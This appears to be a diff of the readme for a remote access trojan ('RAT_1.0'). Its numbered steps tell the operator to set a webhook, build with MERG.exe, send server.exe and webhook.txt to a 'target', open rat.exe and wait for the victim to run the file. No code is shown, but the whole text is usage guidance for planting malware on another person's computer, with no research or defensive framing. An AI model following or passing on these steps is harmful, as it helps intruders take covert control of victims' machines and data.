rrpt66/RAT/RAT_1.0/readme.txt

-1 edit webhook in webhook.txt and Use MERG.exe
+1 edit webhook in webhook.txt and Use MERG.exe IF File webhook.txt is missing You can close MERG.exe now.
 2 send server.exe and webhook.txt to target
 3 open rat.exe
 4 wait for target run file